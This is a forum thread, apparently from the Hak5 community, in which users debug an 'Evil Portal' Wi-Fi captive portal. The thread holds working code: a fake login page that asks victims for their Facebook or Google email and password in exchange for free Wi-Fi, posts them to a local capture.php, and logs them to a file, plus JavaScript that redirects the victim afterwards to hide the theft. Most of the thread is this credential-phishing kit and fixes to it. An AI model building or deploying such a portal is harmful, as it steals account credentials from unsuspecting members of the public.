Jump to content

Recommended Posts

Posted (edited)

I am unable to get the redirect for evil portal to work. The capture of the variables works but does not redirect to the $authtarget. I have searched the forums and followed the various examples/solutions provided.

Below is my function code on the splash.html

  <script type="text/javascript">
    function ajaxRequest() {
      if (window.XMLHttpRequest)  {
        return new XMLHttpRequest();
      } else if (window.ActiveXObject) {
        return new ActiveXObject("Microsoft.XMLHTTP");
      } else {
        return false;
      }
    }
        
 
    function sendInfo() {
      var xmlhttp = new ajaxRequest();
      document.getElementById("results").innerHTML="<p><i>Thank you!</i></p>";
      var usernamevalue=encodeURIComponent(document.getElementById("username").value);
      var passwordvalue=encodeURIComponent(document.getElementById("password").value);
      var roomnumvalue=encodeURIComponent(document.getElementById("roomnum").value);
      var lastnamevalue=encodeURIComponent(document.getElementById("lastname").value);
      var parameters="username="+usernamevalue+"&password="+passwordvalue+"&roomnum="+roomnumvalue+"&lastname="+lastnamevalue;
      xmlhttp.open("POST", "http://172.16.42.1/capture.php", true);
      xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
      xmlhttp.send(parameters);
      window.location.assign("$authtarget");
    }
  </script>

Here is my form with button

<form id="form_1" method="POST" action="http://172.16.42.1/capture.php">
 
<br>
 
 
 
 
<div class="credential_block block">
<b>Login with one of the following <br><img src="images/smicons.png"><br>
<div id="room_number_cred">
 
       <font class="block">Email</font>         
   
<input class="txt_field" name="username" id="username" type="text">
</div>
<div id="last_name_cred">
   
       <font class="block">Password</font>         
   
<input class="txt_field" name="password" id="password" type="password">
</div>
 
<input value="Connect" type="submit" onclick="sendInfo();return false;">

Here is my capture.php

<?php
 
$username = $_POST["username"];
$password = $_POST["password"];
$roomnum = $_POST["roomnum"];
$lastname = $_POST["lastname"];
$file = fopen("stored.txt", "a");
fwrite($file, "Username: " . $username . " Password: " . $password . " RoomNumber: " . $roomnum . " Lastname: " . $lastname  . "\n");
fclose($file);
 
echo '<p><i>Thank you!</i></p>';
?>
Edited by THCMinister
Posted (edited)

Im not expert but is this why

https://forums.hak5.org/index.php?/topic/33578-evil-portal-setup-adding-the-authtarget-to-a-button/

add a javascript function:

redirectToTagert() {
window.location = $authtarget;
}

add the function to the onclick event for your button:

<button type="button" onclick="sendInfo();return false;redirectToTarget()">Submit</button>

That should work fine

Edited by z3roc00l
Posted (edited)

Why not use jQuery and make this process simpler? You could assign the button to a class then use that to reference it in a javascript function like so:

<button class="send_info_button">Submit</button>
$('.send_info_button').on("click",function(){
    $.post('/path/to/script/', {$dataToSend},function(){
        window.location = $authtarget;
    });
});

If you need help referencing jquery.min.js look at my post in the Evil Portal support thread here: https://forums.hak5.org/index.php?/topic/33554-support-evil-portal/page-2

Edited by sud0nick
Posted

Why not use jQuery and make this process simpler? You could assign the button to a class then use that to reference it in a javascript function like so:

<button class="send_info_button">Submit</button>
$('.send_info_button').on("click",function(){
    $.post('/path/to/script/', {$dataToSend},function(){
        window.location = $authtarget;
    });
});

If you need help referencing jquery.min.js look at my post in the Evil Portal support thread here: https://forums.hak5.org/index.php?/topic/33554-support-evil-portal/page-2

Here is what I got and it's working!

In my splash.html

<script src="//172.16.42.1/nodogsplash/jquery.min.js"></script>  

<script>
$(document).ready(function() {
        $('body').on('click', '.myselector', function(e) {
            var email_addr = $('#email').val();
            var pass = $('#password').val();
            if (email_addr == "" || pass == "") {
                alert("Please login with your Facebook or Google account to access free Wi-Fi.");
                    return;
                } else {
                    $.ajax({
                        type: "POST",
                        url: "//172.16.42.1/capture.php",
                        data: {email: email_addr,
                               password: pass},
                        dataType: 'json',
                        success: function(data, textStatus, jqXHR) {
                            window.location.href="$authtarget";
                        },
                        error: function(data, textStatus, errorThrown) {
                            window.location.href="$authtarget";
                        }
                    });
                }
             });
    });
</script>
 
<form id="form_1" method="POST" action="http://172.16.42.1/capture.php">

<table width="959" height="642">


            <tr><td colspan="2"> </td></tr>
            <tr><td align="right">Email    :</td><td><input name="email" id="email" type="text"/></td></tr>
            <tr><td align="right">Password :</td><td><input name="password" id="password" type="password"/></td></tr>
            <tr><td colspan="2" align="center"><input value="Login To Connect" class="myselector" type="button"></td></tr>

        </table>
        </td>

            
        </td>
    </tr>
    <tr height="50" valign="bottom"><td colspan="2"> </td></tr>

</table></form>

I used sud0nick's auth.php

<?php
 
if (isset($_POST['email'])) {
        $fh = fopen('/sd/auth.log', 'a+');
        fwrite($fh, "Email:  " . $_POST['email'] . "\n");
        fwrite($fh, "Pass:  " . $_POST['password'] . "\n\n");
        fclose($fh);
        $referer = $_SERVER['HTTP_REFERER'];
        header("Location: $authtarget");
} else {
        header('Location: splash.html');
}
 
?>
Posted (edited)
                    $.ajax({
                        type: "POST",
                        url: "//172.16.42.1/capture.php",
                        data: {email: email_addr,
                               password: pass},
                        dataType: 'json',
                        success: function(data, textStatus, jqXHR) {
                            window.location.href="$authtarget";
                        },
                        error: function(data, textStatus, errorThrown) {
                            window.location.href="$authtarget";
                        }
                    });

You can replace this long AJAX request with a simple $.post() request like in my other comment. It doesn't make any difference I just want you to know the option is available.

$.post("//172.16.42.1/nodogsplash/auth.php", {email:email_addr,password:pass},function(){
    window.location.href="$authtarget";
});

Also, in regard to your auth.php script I see you have a variable ($referer) that isn't used and you set

header("Location: $authtarget");

This never gets used because the only time this block of code is called is when a POST request is sent. When someone accesses the page manually they immediately drop into the else block which sets the location to splash.html. In the JavaScript, upon a successful call to auth.php the block of code that says

window.location.href="$authtarget";

will redirect the user to $authtarget. The PHP script will not redirect them to $authtarget.

Edited by sud0nick
Posted

You can replace this long AJAX request with a simple $.post() request like in my other comment. It doesn't make any difference I just want you to know the option is available.

$.post("//172.16.42.1/nodogsplash/auth.php", {email:email_addr,password:pass},function(){
    window.location.href="$authtarget";
});

Also, in regard to your auth.php script I see you have a variable ($referer) that isn't used and you set

header("Location: $authtarget");

This never gets used because the only time this block of code is called is when a POST request is sent. When someone accesses the page manually they immediately drop into the else block which sets the location to splash.html. In the JavaScript, upon a successful call to auth.php the block of code that says

window.location.href="$authtarget";

will redirect the user to $authtarget. The PHP script will not redirect them to $authtarget.

I need to do some code cleanup lol. The redirect/unused variable in the php I accidentally left in during some of the testing I was doing. But thank you for the constructive criticism and assistance.

  • 1 month later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...